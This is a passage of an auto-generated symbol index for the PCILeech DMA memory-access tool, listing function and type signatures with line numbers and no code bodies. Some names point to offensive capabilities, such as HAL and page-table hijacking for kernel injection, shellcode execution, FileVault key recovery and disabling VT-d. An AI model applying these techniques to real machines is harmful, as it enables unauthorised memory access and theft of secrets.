function LPCSTR (line 1248) | LPCSTR CharUtil_PathSplitLast(_In_ LPCSTR usz)
function LPCSTR (line 1271) | LPCSTR CharUtil_PathSplitNext(_In_ LPCSTR usz)
function LPCSTR (line 1297) | LPCSTR CharUtil_SplitFirst(_In_ LPCSTR usz, _In_ CHAR ch, _Out_writes_(c...
function LPCSTR (line 1319) | LPCSTR CharUtil_SplitLast(_In_ LPCSTR usz, _In_ CHAR ch, _Out_writes_(cb...
function CharUtil_SplitList (line 1341) | _Success_(return)
function LPCSTR (line 1384) | LPCSTR CharUtil_PathSplitFirst(_In_ LPCSTR usz, _Out_writes_(cbu1) LPSTR...
function QWORD (line 1402) | QWORD CharUtil_HashPathFs_Internal(_In_ LPCSTR uszPathFs)
function QWORD (line 1422) | QWORD CharUtil_HashPathFsU(_In_ LPCSTR uszPath)
function QWORD (line 1427) | QWORD CharUtil_HashPathFsA(_In_ LPCSTR szPath)
function QWORD (line 1435) | QWORD CharUtil_HashPathFsW(_In_ LPCWSTR wszPath)
function BOOL (line 1454) | BOOL CharUtil_StrCmpAny(_In_opt_ CHARUTIL_STRCMP_PFN pfnStrCmp, _In_opt_...
function BOOL (line 1480) | BOOL CharUtil_StrCmpAnyEx(_In_opt_ CHARUTIL_STRCMP_PFN pfnStrCmp, _In_op...
function BOOL (line 1502) | BOOL CharUtil_StrCmpAll(_In_opt_ CHARUTIL_STRCMP_PFN pfnStrCmp, _In_opt_...
function BOOL (line 1525) | BOOL CharUtil_StrEndsWith(_In_opt_ LPCSTR usz, _In_opt_ LPCSTR uszEndsWi...
function BOOL (line 1544) | BOOL CharUtil_StrStartsWith(_In_opt_ LPCSTR usz, _In_opt_ LPCSTR uszStar...
function BOOL (line 1561) | BOOL CharUtil_StrEquals(_In_opt_ LPCSTR usz, _In_opt_ LPCSTR usz2, _In_ ...
function LPCSTR (line 1579) | LPCSTR CharUtil_StrContains(_In_opt_ LPCSTR usz, _In_opt_ LPCSTR uszSubS...
function CharUtil_CmpWU (line 1626) | int CharUtil_CmpWU(_In_opt_ LPWSTR wsz1, _In_opt_ LPSTR usz2, _In_ BOOL ...
function CharUtil_CmpWW (line 1644) | int CharUtil_CmpWW(_In_opt_ LPCWSTR wsz1, _In_opt_ LPCWSTR wsz2, _In_ BO...
FILE: pcileech/charutil.h
type QWORD (line 11) | typedef unsigned __int64 QWORD, *PQWORD;
type BOOL (line 391) | typedef BOOL(*CHARUTIL_STRCMP_PFN)(_In_opt_ LPCSTR usz1, _In_opt_ LPCSTR...
FILE: pcileech/device.c
function DeviceReadDMA_Retry (line 12) | _Success_(return)
function DeviceWriteDMA_Retry (line 18) | _Success_(return)
function DeviceWriteDMA_Verify (line 24) | _Success_(return)
function DWORD (line 37) | DWORD DeviceReadDMA(_In_ QWORD pa, _In_ DWORD cb, _Out_writes_(cb) PBYTE...
function DeviceOpen2_SetCustomMemMap (line 71) | _Success_(return)
function DeviceOpen2_RequestUserInput (line 108) | _Success_(return)
function DeviceOpen2_RequestUserInput (line 141) | _Success_(return)
function DeviceOpen2 (line 148) | _Success_(return)
function DeviceOpen (line 209) | _Success_(return)
function DeviceWriteMEM (line 222) | _Success_(return)
function DeviceReadMEM (line 231) | _Success_(return)
FILE: pcileech/executor.c
type EXEC_IO (line 16) | typedef struct tdEXEC_IO {
type CONSOLEREDIR_THREADDATA (line 33) | typedef struct tdCONSOLEREDIR_THREADDATA {
type EXEC_HANDLE (line 43) | typedef struct tdEXEC_HANDLE {
function DWORD (line 56) | DWORD WINAPI ConsoleRedirect_ThreadConsoleInput(PCONSOLEREDIR_THREADDATA...
function DWORD (line 78) | DWORD WINAPI ConsoleRedirect_ThreadConsoleOutput(PCONSOLEREDIR_THREADDAT...
function BOOL (line 90) | BOOL Exec_ConsoleRedirect_Initialize(_In_ QWORD ConsoleBufferAddr_InputS...
function VOID (line 115) | VOID Exec_ConsoleRedirect(_In_ QWORD ConsoleBufferAddr_InputStream, _In_...
function Exec_Callback (line 145) | _Success_(return)
function VOID (line 206) | VOID Exec_CallbackClose(_In_opt_ HANDLE hCallback)
function Exec_ExecSilent (line 227) | _Success_(return)
function VOID (line 278) | VOID ActionExecShellcode()
function VOID (line 408) | VOID ActionAgentExecPy()
function DWORD (line 457) | DWORD ActionAgentForensic_OutFileDirectory(_Out_writes_z_(MAX_PATH) LPST...
function VOID (line 478) | VOID ActionAgentForensic_GetFile(_In_ LPSTR szRemoteFile, _In_ LPSTR szO...
function VOID (line 520) | VOID ActionAgentForensic()
function VOID (line 623) | VOID ActionAgentForensic()
FILE: pcileech/extra.c
function VOID (line 10) | VOID Extra_MacFVRecover_ReadMemory_Optimized(_Inout_ PBYTE pb512M)
function BOOL (line 23) | BOOL Extra_MacFVRecover_Analyze(_In_ PBYTE pb512M)
function VOID (line 76) | VOID Extra_MacFVRecover_SetOutFileName()
function VOID (line 95) | VOID Action_MacFilevaultRecover(_In_ BOOL IsRebootRequired)
function VOID (line 147) | VOID Action_MacDisableVtd()
function VOID (line 183) | VOID Action_PT_Phys2Virt()
function VOID (line 203) | VOID Action_PT_Virt2Phys()
function VOID (line 225) | VOID Action_TlpTx_DummyCB(_In_opt_ PVOID ctx, _In_ DWORD cbTlp, _In_ PBY...
function VOID (line 230) | VOID Action_TlpTx()
function VOID (line 255) | VOID Action_TlpTxLoop()
function VOID (line 310) | VOID Action_RegCfgReadWrite()
function VOID (line 393) | VOID Extra_BarReadWriteCallback(_Inout_ PLC_BAR_REQUEST pBarRequest)
function VOID (line 435) | VOID Extra_BarReadWriteInitialize()
function QWORD (line 476) | QWORD Extra_Benchmark_ReadSingle(_In_ PPMEM_SCATTER ppMEMs, _In_ QWORD cb)
function VOID (line 520) | VOID Action_Benchmark()
FILE: pcileech/help.c
function VOID (line 10) | VOID ShowListFiles(_In_ LPSTR szSearchPattern, _In_ DWORD cchSpaces, _In...
function VOID (line 28) | VOID Help_ShowGeneral()
function VOID (line 181) | VOID Help_ShowInfo()
function VOID (line 228) | VOID _HelpShowExecCommand()
function VOID (line 249) | VOID Help_ShowDetailed()
FILE: pcileech/kmd.c
type KMDHANDLE_S12 (line 14) | typedef struct tdKMDHANDLE_S12 {
type KERNELSEEKER (line 25) | typedef struct tdKERNELSEEKER {
function KMD_FindSignature2 (line 47) | _Success_(return)
function KMD_FindSignature1 (line 80) | _Success_(return)
function KMD_FindSignature_EfiRuntimeServices (line 120) | _Success_(return)
function BOOL (line 175) | BOOL KMD_MacOSIsKernelAddress(_In_ PBYTE pbPage)
function KMD_MacOSKernelGetBase (line 189) | _Success_(return)
function KMD_MacOSKernelSeekSignature (line 213) | _Success_(return)
function KMD_FreeBSDKernelSeekSignature (line 244) | _Success_(return)
type KALLSYMS_SYMBOL (line 297) | typedef struct tdKALLSYMS_SYMBOL {
function POB_MAP (line 308) | POB_MAP KMD_Kallsyms_Collect(_In_reads_bytes_(cb) PBYTE pb, _In_ DWORD c...
function POB_MAP (line 558) | POB_MAP KMD_Kallsyms(_In_reads_bytes_(cb) PBYTE pb, _In_ DWORD cb)
function VOID (line 589) | VOID KMD_LinuxFindFunctionAddrTBL_FromKallsyms(_In_ PBYTE pb, _In_ DWORD...
function DWORD (line 631) | DWORD KMD_LinuxFindFunctionAddr(_In_ PBYTE pb, _In_ DWORD cb, _In_ PKERN...
function VOID (line 649) | VOID KMD_LinuxFindFunctionAddrTBL_Absolute(_In_ PBYTE pb, _In_ DWORD cb,...
function KMD_LinuxFindFunctionAddrTBL_RelativeSymTabSearch (line 669) | _Success_(return)
function QWORD (line 686) | QWORD KMD_LinuxFindFunctionAddrTBL_FromSystemMap_GetAddressFromName(_In_...
function VOID (line 695) | VOID KMD_LinuxFindFunctionAddrTBL_FromSystemMap(_In_ PBYTE pb, _In_ DWOR...
function VOID (line 720) | VOID KMD_LinuxFindFunctionAddrTBL_Relative(_In_ PBYTE pb, _In_ DWORD cb,...
function VOID (line 749) | VOID KMD_LinuxFindFunctionAddrTBL(_In_ PBYTE pb, _In_ DWORD cb, _In_ PKE...
function KMD_Linux46KernelSeekSignature (line 757) | _Success_(return)
function QWORD (line 795) | QWORD KMD_Linux48KernelBaseSeek()
function VOID (line 856) | VOID KMD_Linux48KernelSeekSignature_KallsymsFromKDBGetSym(_In_reads_(KMD...
function KMD_Linux48KernelSeekSignature (line 875) | _Success_(return)
function KMDOpen_LinuxEfiRuntimeServicesHijack (line 923) | _Success_(return)
function KMD_Win_SearchTableHalpApicRequestInterrupt (line 1015) | _Success_(return)
function KMDOpen_UEFI_FindEfiBase (line 1034) | _Success_(return)
function KMDOpen_UEFI (line 1073) | _Success_(return)
function KMDOpen_WINX64_2_VMM (line 1166) | _Success_(return)
function KMDOpen_WINX64_3_VMM (line 1348) | _Success_(return)
function KMDOpen_HalHijack (line 1487) | _Success_(return)
function KMD_IsRangeInPhysicalMap (line 1595) | _Success_(return)
function KMD_SubmitCommand (line 1609) | _Success_(return)
function VOID (line 1642) | VOID KMD_PhysicalMemoryMapDisplay(_In_ PKMDHANDLE phKMD)
function VOID (line 1658) | VOID KMD_CheckMigrationStatus()
function KMD_GetPhysicalMemoryMap (line 1679) | _Success_(return)
function KMD_SetupStage3 (line 1709) | _Success_(return)
function KMDReadMemory_DMABufferSized (line 1745) | _Success_(return)
function KMDWriteMemory_DMABufferSized (line 1759) | _Success_(return)
function KMDReadMemory (line 1773) | _Success_(return)
function KMDWriteMemory (line 1789) | _Success_(return)
function VOID (line 1805) | VOID KMDUnload()
function VOID (line 1813) | VOID KMDClose()
function KMDOpen_MemoryScan (line 1823) | _Success_(return)
function KMDOpen_PageTableHijack (line 1941) | _Success_(return)
function KMD_SetupStage3_FromPartial (line 2066) | _Success_(return)
function KMDOpen_LoadExisting (line 2081) | _Success_(return)
function KMDOpen (line 2115) | _Success_(return)
FILE: pcileech/memdump.c
type MEMDUMP_FILEWRITE_DATA (line 22) | typedef struct tdMEMDUMP_FILEWRITE_DATA {
type MEMDUMP_FILEWRITE (line 29) | typedef struct tdMEMDUMP_FILEWRITE {
function VOID (line 39) | VOID MemoryDump_SetOutFileName()
function DWORD (line 60) | DWORD WINAPI MemoryDump_File_ThreadProc(_In_ PMEMDUMP_FILEWRITE ctx)
function VOID (line 80) | VOID MemoryDump_File_Close(_Post_ptr_invalid_ PMEMDUMP_FILEWRITE pfw)
function PMEMDUMP_FILEWRITE (line 90) | PMEMDUMP_FILEWRITE MemoryDump_File_Initialize(_In_ BOOL fAllocFile4GB)
function VOID (line 144) | VOID ActionMemoryDump_KMD_USB3380()
function VOID (line 191) | VOID ActionMemoryDump_Native()
function VOID (line 239) | VOID ActionMemoryDump()
function VOID (line 250) | VOID ActionMemoryProbe()
function VOID (line 279) | VOID ActionMemoryDisplayPhysical()
function VOID (line 305) | VOID ActionMemoryDisplayVirtual()
function VOID (line 344) | VOID ActionMemoryPageDisplay()
function VOID (line 359) | VOID ActionMemoryTestReadWrite()
function VOID (line 400) | VOID ActionMemoryWrite()
FILE: pcileech/mempatch.c
function Patch_CmpChunk (line 12) | _Success_(return)
function Patch_FindAndPatch (line 43) | _Success_(return)
function VOID (line 72) | VOID ActionPatchAndSearchPhysical()
type SEARCH_INTERNAL_CONTEXT (line 160) | typedef struct tdSEARCH_INTERNAL_CONTEXT {
function BOOL (line 174) | BOOL ActionPatchAndSearchVirtual_ResultCB(_In_ PVMMDLL_MEM_SEARCH_CONTEX...
function VOID (line 212) | VOID ActionPatchAndSearchVirtual()
FILE: pcileech/ob/ob.h
type QWORD (line 11) | typedef unsigned __int64 QWORD, *PQWORD;
type tdVMM_HANDLE (line 22) | struct tdVMM_HANDLE
type OB (line 53) | typedef struct tdOB {
type VOID (line 76) | typedef VOID(*OB_CLEANUP_CB)(_In_ PVOID pOb);
function PVOID (line 103) | __forceinline PVOID Ob_Alloc(_In_ DWORD tag, _In_ UINT uFlags, _In_ SIZE...
type OB_DATA (line 150) | typedef struct tdOB_DATA {
type OB_CONTAINER (line 186) | typedef struct tdOB_CONTAINER {
type tdOB_SET (line 239) | struct tdOB_SET
type tdOB_MAP (line 395) | struct tdOB_MAP
type OB_MAP_ENTRY (line 402) | typedef struct tdOB_MAP_ENTRY {
type VOID (line 636) | typedef VOID(*OB_MAP_FILTER_PFN_CB)(_In_opt_ PVOID ctx, _In_ QWORD k, _I...
type VOID (line 641) | typedef VOID(*OB_MAP_FILTERSET_PFN_CB)(_In_opt_ PVOID ctx, _In_ POB_SET ...
type BOOL (line 646) | typedef BOOL(*OB_MAP_FILTER_REMOVE_PFN_CB)(_In_opt_ PVOID ctx, _In_ QWOR...
type tdOB_CACHEMAP (line 725) | struct tdOB_CACHEMAP
type BOOL (line 738) | typedef BOOL(*OB_CACHEMAP_VALIDENTRY_PFN_CB)(
type tdOB_STRMAP (line 837) | struct tdOB_STRMAP
type tdOB_COMPRESSED (line 1088) | struct tdOB_COMPRESSED
type tdOB_MEMFILE (line 1147) | struct tdOB_MEMFILE
type tdOB_COUNTER (line 1231) | struct tdOB_COUNTER
type OB_COUNTER_ENTRY (line 1233) | typedef struct tdOB_COUNTER_ENTRY {
type tdOB_BYTEQUEUE (line 1404) | struct tdOB_BYTEQUEUE
FILE: pcileech/ob/ob_cachemap.c
type OB_CACHEMAPENTRY (line 29) | typedef struct tdOB_CACHEMAPENTRY {
type OB_CACHEMAP (line 36) | typedef struct tdOB_CACHEMAP {
function _ObCacheMap_Clear (line 48) | _Success_(return)
function ObCacheMap_Clear (line 74) | _Success_(return)
function PVOID (line 80) | PVOID _ObCacheMap_RemoveByKey(_In_ POB_CACHEMAP pcm, _In_ QWORD qwKey, _...
function PVOID (line 106) | PVOID _ObCacheMap_GetByKey(_In_ POB_CACHEMAP pcm, _In_ QWORD qwKey)
function _ObCacheMap_Push (line 129) | _Success_(return)
function PVOID (line 169) | PVOID ObCacheMap_GetByKey(_In_opt_ POB_CACHEMAP pcm, _In_ QWORD qwKey)
function PVOID (line 182) | PVOID ObCacheMap_RemoveByKey(_In_opt_ POB_CACHEMAP pcm, _In_ QWORD qwKey)
function BOOL (line 193) | BOOL ObCacheMap_ExistsKey(_In_opt_ POB_CACHEMAP pcm, _In_ QWORD qwKey)
function DWORD (line 203) | DWORD ObCacheMap_Size(_In_opt_ POB_CACHEMAP pcm)
function ObCacheMap_Push (line 208) | _Success_(return)
function VOID (line 219) | VOID _ObCacheMap_ObCloseCallback(_In_ POB_CACHEMAP pObCacheMap)
function POB_CACHEMAP (line 237) | POB_CACHEMAP ObCacheMap_New(_In_opt_ VMM_HANDLE H, _In_ DWORD cMaxEntrie...
FILE: pcileech/ob/ob_core.c
function PVOID (line 38) | PVOID Ob_AllocEx(_In_opt_ VMM_HANDLE H, _In_ DWORD tag, _In_ UINT uFlags...
function PVOID (line 67) | PVOID Ob_XINCREF(_In_opt_ PVOID pObIn)
function PVOID (line 87) | PVOID Ob_XDECREF(_In_opt_ PVOID pObIn)
function VOID (line 130) | VOID Ob_XDECREF_NULL(_In_opt_ PVOID *ppOb)
function BOOL (line 146) | BOOL Ob_VALID_TAG(_In_ PVOID pObIn, _In_ DWORD tag)
function POB_DATA (line 163) | POB_DATA ObData_New(_In_opt_ VMM_HANDLE H, _In_ PBYTE pb, _In_ DWORD cb)
FILE: pcileech/ob/ob_map.c
type OB_MAP (line 31) | typedef struct tdOB_MAP {
function VOID (line 76) | VOID _ObMap_ObFreeAllObjects(_In_ POB_MAP pObMap)
function VOID (line 98) | VOID _ObMap_ObCloseCallback(_In_ POB_MAP pObMap)
function POB_MAP_ENTRY (line 117) | POB_MAP_ENTRY _ObMap_GetFromIndex(_In_ POB_MAP pm, _In_ DWORD iEntry)
function QWORD (line 123) | QWORD _ObMap_GetFromEntryIndex(_In_ POB_MAP pm, _In_ BOOL fValueHash, _I...
function VOID (line 129) | VOID _ObMap_SetHashIndex(_In_ POB_MAP pm, _In_ BOOL fValueHash, _In_ DWO...
function VOID (line 138) | VOID _ObMap_InsertHash(_In_ POB_MAP pm, _In_ BOOL fValueHash, _In_ DWORD...
function VOID (line 151) | VOID _ObMap_RemoveHash(_In_ POB_MAP pm, _In_ BOOL fValueHash, _In_ QWORD...
function _ObMap_GetEntryIndexFromKeyOrValue (line 178) | _Success_(return)
function BOOL (line 204) | BOOL _ObMap_Exists(_In_ POB_MAP pm, _In_ BOOL fValueHash, _In_ QWORD kv)
function DWORD (line 215) | DWORD ObMap_Size(_In_opt_ POB_MAP pm)
function BOOL (line 226) | BOOL ObMap_Exists(_In_opt_ POB_MAP pm, _In_ PVOID pvObject)
function BOOL (line 237) | BOOL ObMap_ExistsKey(_In_opt_ POB_MAP pm, _In_ QWORD qwKey)
function PVOID (line 242) | PVOID _ObMap_GetByEntryIndex(_In_ POB_MAP pm, _In_ DWORD iEntry)
function PVOID (line 249) | PVOID _ObMap_GetByKey(_In_ POB_MAP pm, _In_ QWORD qwKey)
function PVOID (line 255) | PVOID _ObMap_GetNext(_In_ POB_MAP pm, _In_opt_ PVOID pvObject)
function PVOID (line 266) | PVOID _ObMap_GetNextByKey(_In_ POB_MAP pm, _In_ QWORD qwKey, _In_opt_ PV...
function PVOID (line 277) | PVOID _ObMap_GetNextByIndex(_In_ POB_MAP pm, _Inout_ PDWORD pdwIndex, _I...
function _ObMap_QFind (line 296) | _Success_(return)
function PVOID (line 350) | PVOID _ObMap_GetNextByKeySorted(_In_ POB_MAP pm, _In_ QWORD qwKey, _In_o...
function QWORD (line 367) | QWORD _ObMap_GetKey(_In_ POB_MAP pm, _In_ PVOID pvObject)
function _ObMap_Filter (line 374) | _Success_(return)
function POB_SET (line 387) | POB_SET _ObMap_FilterSet(_In_ POB_MAP pm, _In_opt_ PVOID ctx, _In_ OB_MA...
function PVOID (line 411) | PVOID ObMap_GetByIndex(_In_opt_ POB_MAP pm, _In_ DWORD index)
function PVOID (line 423) | PVOID ObMap_GetByKey(_In_opt_ POB_MAP pm, _In_ QWORD qwKey)
function PVOID (line 439) | PVOID ObMap_GetNext(_In_opt_ POB_MAP pm, _In_opt_ PVOID pvObject)
function PVOID (line 459) | PVOID ObMap_GetNextByKey(_In_opt_ POB_MAP pm, _In_ QWORD qwKey, _In_opt_...
function PVOID (line 477) | PVOID ObMap_GetNextByKeySorted(_In_opt_ POB_MAP pm, _In_ QWORD qwKey, _I...
function PVOID (line 498) | PVOID ObMap_GetNextByIndex(_In_opt_ POB_MAP pm, _Inout_ PDWORD pdwIndex,...
function QWORD (line 510) | QWORD ObMap_GetKey(_In_opt_ POB_MAP pm, _In_ PVOID pvObject)
function PVOID (line 521) | PVOID ObMap_Peek(_In_opt_ POB_MAP pm)
function QWORD (line 531) | QWORD ObMap_PeekKey(_In_opt_ POB_MAP pm)
function ObMap_Filter (line 543) | _Success_(return)
function POB_SET (line 559) | POB_SET ObMap_FilterSet(_In_opt_ POB_MAP pm, _In_opt_ PVOID ctx, _In_opt...
function VOID (line 568) | VOID ObMap_FilterSet_FilterAllKey(_In_opt_ PVOID ctx, _In_ POB_SET ps, _...
function PVOID (line 584) | PVOID _ObMap_RetrieveAndRemoveByEntryIndex(_In_ POB_MAP pm, _In_ DWORD i...
function PVOID (line 608) | PVOID _ObMap_RemoveOrRemoveByKey(_In_ POB_MAP pm, _In_ BOOL fValueHash, ...
function DWORD (line 616) | DWORD _ObMap_RemoveByFilter(_In_ POB_MAP pm, _In_opt_ PVOID ctx, _In_ OB...
function PVOID (line 641) | PVOID ObMap_Pop(_In_opt_ POB_MAP pm)
function PVOID (line 654) | PVOID ObMap_PopWithKey(_In_opt_ POB_MAP pm, _Out_opt_ PQWORD pKey)
function PVOID (line 666) | PVOID ObMap_Remove(_In_opt_ POB_MAP pm, _In_ PVOID pvObject)
function PVOID (line 679) | PVOID ObMap_RemoveByKey(_In_opt_ POB_MAP pm, _In_ QWORD qwKey)
function DWORD (line 691) | DWORD ObMap_RemoveByFilter(_In_opt_ POB_MAP pm, _In_opt_ PVOID ctx, _In_...
function ObMap_Clear (line 703) | _Success_(return)
function _ObMap_SortEntryIndex (line 727) | _Success_(return)
function _ObMap_SortEntryIndexByKey_CmpSort (line 757) | int _ObMap_SortEntryIndexByKey_CmpSort(_In_ POB_MAP_ENTRY e1, _In_ POB_M...
function ObMap_SortEntryIndex (line 772) | _Success_(return)
function ObMap_SortEntryIndexByKey (line 785) | _Success_(return)
function _ObMap_Grow (line 801) | _Success_(return)
function _ObMap_Push (line 829) | _Success_(return)
function _ObMap_PushCopy (line 863) | _Success_(return)
function _ObMap_PushAll (line 875) | _Success_(return)
function ObMap_Push (line 898) | _Success_(return)
function ObMap_PushCopy (line 914) | _Success_(return)
function ObMap_PushAll (line 927) | _Success_(return)
function POB_MAP (line 942) | POB_MAP ObMap_New(_In_opt_ VMM_HANDLE H, _In_ QWORD flags)
FILE: pcileech/ob/ob_set.c
type OB_SET_TABLE_ENTRY (line 29) | typedef struct tdOB_SET_TABLE_ENTRY {
type OB_SET_TABLE_DIRECTORY_ENTRY (line 36) | typedef struct tdOB_SET_TABLE_DIRECTORY_ENTRY {
type OB_SET (line 43) | typedef struct tdOB_SET {
function VOID (line 82) | VOID _ObSet_ObCloseCallback(_In_ POB_SET pObSet)
function POB_SET (line 116) | POB_SET ObSet_New(_In_opt_ VMM_HANDLE H)
function QWORD (line 128) | QWORD _ObSet_GetValueFromIndex(_In_ POB_SET pvs, _In_ DWORD iValue)
function VOID (line 139) | VOID _ObSet_SetValueFromIndex(_In_ POB_SET pvs, _In_ DWORD iValue, _In_ ...
function DWORD (line 151) | DWORD _ObSet_GetIndexFromHash(_In_ POB_SET pvs, _In_ DWORD iHash)
function VOID (line 156) | VOID _ObSet_SetHashIndex(_In_ POB_SET pvs, _In_ DWORD iHash, _In_ DWORD ...
function VOID (line 165) | VOID _ObSet_InsertHash(_In_ POB_SET pvs, _In_ DWORD iValue)
function VOID (line 178) | VOID _ObSet_RemoveHash(_In_ POB_SET pvs, _In_ DWORD iHash)
function _ObSet_GetIndexFromValue (line 201) | _Success_(return)
function BOOL (line 220) | BOOL _ObSet_Exists(_In_ POB_SET pvs, _In_ QWORD value)
function BOOL (line 231) | BOOL ObSet_Exists(_In_opt_ POB_SET pvs, _In_ QWORD value)
function QWORD (line 246) | QWORD ObSet_Get(_In_opt_ POB_SET pvs, _In_ DWORD index)
function QWORD (line 251) | QWORD _ObSet_GetNext(_In_ POB_SET pvs, _In_ QWORD value)
function QWORD (line 261) | QWORD _ObSet_GetNextByIndex(_In_ POB_SET pvs, _Inout_ PDWORD pdwIndex)
function QWORD (line 281) | QWORD ObSet_GetNext(_In_opt_ POB_SET pvs, _In_ QWORD value)
function QWORD (line 298) | QWORD ObSet_GetNextByIndex(_In_opt_ POB_SET pvs, _Inout_ PDWORD pdwIndex)
function POB_DATA (line 303) | POB_DATA _ObSet_GetAll(_In_ POB_SET pvs)
function POB_DATA (line 321) | POB_DATA ObSet_GetAll(_In_opt_ POB_SET pvs)
function BOOL (line 326) | BOOL _ObSet_Remove(_In_ POB_SET pvs, _In_ QWORD value)
function BOOL (line 355) | BOOL ObSet_Remove(_In_opt_ POB_SET pvs, _In_ QWORD value)
function VOID (line 365) | VOID ObSet_Clear(_In_opt_ POB_SET pvs)
function QWORD (line 382) | QWORD _ObSet_Pop(_In_ POB_SET pvs)
function QWORD (line 402) | QWORD ObSet_Pop(_In_opt_ POB_SET pvs)
function _ObSet_Grow (line 412) | _Success_(return)
function _ObSet_Push (line 433) | _Success_(return)
function _ObSet_PushSet (line 463) | _Success_(return)
function _ObSet_PushData (line 478) | _Success_(return)
function ObSet_Push (line 497) | _Success_(return)
function ObSet_PushSet (line 510) | _Success_(return)
function ObSet_PushData (line 523) | _Success_(return)
function VOID (line 537) | VOID ObSet_Push_PageAlign(_In_opt_ POB_SET pvs, _In_ QWORD a, _In_ DWORD...
function DWORD (line 554) | DWORD ObSet_Size(_In_opt_ POB_SET pvs)
FILE: pcileech/oscompatibility.c
function VOID (line 11) | VOID usleep(_In_ DWORD us)
type INTERNAL_HANDLE (line 37) | typedef struct tdINTERNAL_HANDLE {
function HANDLE (line 42) | HANDLE LocalAlloc(DWORD uFlags, SIZE_T uBytes)
function VOID (line 51) | VOID LocalFree(HANDLE hMem)
function QWORD (line 60) | QWORD GetTickCount64()
function BOOL (line 67) | BOOL QueryPerformanceFrequency(_Out_ LARGE_INTEGER *lpFrequency)
function BOOL (line 73) | BOOL QueryPerformanceCounter(_Out_ LARGE_INTEGER *lpPerformanceCount)
function HANDLE (line 81) | HANDLE CreateThread(
function VOID (line 104) | VOID GetLocalTime(LPSYSTEMTIME lpSystemTime)
function HANDLE (line 120) | HANDLE FindFirstFileA(LPSTR lpFileName, LPWIN32_FIND_DATAA lpFindFileData)
function BOOL (line 139) | BOOL FindNextFileA(HANDLE hFindFile, LPWIN32_FIND_DATAA lpFindFileData)
function DWORD (line 156) | DWORD InterlockedAdd(DWORD *Addend, DWORD Value)
function HMODULE (line 165) | HMODULE LoadLibraryA(LPSTR lpFileName)
function BOOL (line 170) | BOOL FreeLibrary(_In_ HMODULE hLibModule)
function FARPROC (line 176) | FARPROC GetProcAddress(HMODULE hModule, LPSTR lpProcName)
function pthread_tryjoin_np (line 184) | static int pthread_tryjoin_np(pthread_t thread, void **retval)
function BOOL (line 203) | BOOL GetExitCodeThread(HANDLE hThread, PDWORD lpExitCode)
function VOID (line 215) | VOID InitializeCriticalSection(LPCRITICAL_SECTION lpCriticalSection) {
function VOID (line 222) | VOID DeleteCriticalSection(LPCRITICAL_SECTION lpCriticalSection) {
function VOID (line 227) | VOID EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection) {
function VOID (line 231) | VOID LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection) {
function VOID (line 239) | VOID terminal_enable_raw_mode()
function VOID (line 247) | VOID terminal_disable_raw_mode()
function BOOL (line 255) | BOOL _kbhit()
function futex (line 278) | static int futex(uint32_t *uaddr, int futex_op, uint32_t val, const stru...
function VOID (line 283) | VOID InitializeSRWLock(PSRWLOCK pSRWLock)
function BOOL (line 288) | BOOL AcquireSRWLockExclusive_Try(_Inout_ PSRWLOCK pSRWLock)
function VOID (line 299) | VOID AcquireSRWLockExclusive(_Inout_ PSRWLOCK pSRWLock)
function AcquireSRWLockExclusive_Timeout (line 312) | _Success_(return)
function VOID (line 339) | VOID ReleaseSRWLockExclusive(_Inout_ PSRWLOCK pSRWLock)
function VOID (line 353) | VOID InitializeSRWLock(PSRWLOCK pSRWLock)
function BOOL (line 360) | BOOL AcquireSRWLockExclusive_Try(_Inout_ PSRWLOCK pSRWLock)
function VOID (line 366) | VOID AcquireSRWLockExclusive(_Inout_ PSRWLOCK pSRWLock)
function AcquireSRWLockExclusive_Timeout (line 372) | _Success_(return)
function VOID (line 380) | VOID ReleaseSRWLockExclusive(_Inout_ PSRWLOCK pSRWLock)
function DWORD (line 399) | DWORD GetModuleFileNameA(_In_opt_ HMODULE hModule, _Out_ LPSTR lpFilenam...
function DWORD (line 420) | DWORD GetModuleFileNameA(_In_opt_ HMODULE hModule, _Out_ LPSTR lpFilenam...
FILE: pcileech/oscompatibility.h
type QWORD (line 23) | typedef unsigned __int64 QWORD, *PQWORD;
type VOID (line 61) | typedef void VOID, *PVOID, *LPVOID;
type BOOL (line 63) | typedef uint32_t BOOL, *PBOOL;
type BYTE (line 64) | typedef uint8_t BYTE, *PBYTE, *LPBYTE;
type UCHAR (line 65) | typedef uint8_t UCHAR, *PUCHAR;
type CHAR (line 66) | typedef char CHAR, *PCHAR, *PSTR, *LPSTR;
type SHORT (line 68) | typedef int16_t SHORT, *PSHORT;
type LONG (line 69) | typedef int32_t LONG;
type LONGLONG (line 70) | typedef int64_t LONGLONG;
type WORD (line 71) | typedef uint16_t WORD, *PWORD, USHORT, *PUSHORT;
type WCHAR (line 72) | typedef uint16_t WCHAR, *PWCHAR, *LPWSTR;
type UINT (line 74) | typedef uint32_t UINT, DWORD, *PDWORD, *LPDWO...
type QWORD (line 75) | typedef long long unsigned int QWORD, *PQWORD, ULONG64, *PU...
type DWORD64 (line 76) | typedef uint64_t DWORD64, *PDWORD64, LARGE_IN...
type SIZE_T (line 77) | typedef size_t SIZE_T, *PSIZE_T;
type M128A (line 78) | typedef struct _M128A { ULONGLONG Low; LONGLONG High; } M128A, *PM128A;
type EXCEPTION_RECORD32 (line 80) | typedef struct tdEXCEPTION_RECORD32 { CHAR sz[80]; } EXCEPTION_RECORD32;
type EXCEPTION_RECORD64 (line 81) | typedef struct tdEXCEPTION_RECORD64 { CHAR sz[152]; } EXCEPTION_RECORD64;
type SID (line 82) | typedef struct tdSID { BYTE pb[12]; } SID, *PSID;
type DWORD (line 83) | typedef DWORD(*PTHREAD_START_ROUTINE)(PVOID);
type DWORD (line 84) | typedef DWORD(*LPTHREAD_START_ROUTINE)(PVOID);
type CRITICAL_SECTION (line 219) | typedef struct tdCRITICAL_SECTION {
type SYSTEMTIME (line 228) | typedef struct _SYSTEMTIME {
type WIN32_FIND_DATAA (line 239) | typedef struct _WIN32_FIND_DATAA {
type SRWLOCK (line 277) | typedef struct tdSRWLOCK {
type SRWLOCK (line 284) | typedef struct tdSRWLOCK {
FILE: pcileech/pcileech.c
function BOOL (line 21) | BOOL PCILeechConfigIntialize(_In_ DWORD argc, _In_ char* argv[])
function VOID (line 241) | VOID PCILeechConfigFixup()
function VOID (line 260) | VOID PCILeechFreeContext()
function VOID (line 277) | VOID WINAPI PCILeechCtrlHandler_TryShutdownThread(PVOID pv)
function BOOL (line 289) | BOOL WINAPI PCILeechCtrlHandler(DWORD fdwCtrlType)
function VOID (line 303) | VOID PCILeechCtrlHandlerInitialize()
function VOID (line 310) | VOID PCILeechCtrlHandlerInitialize()
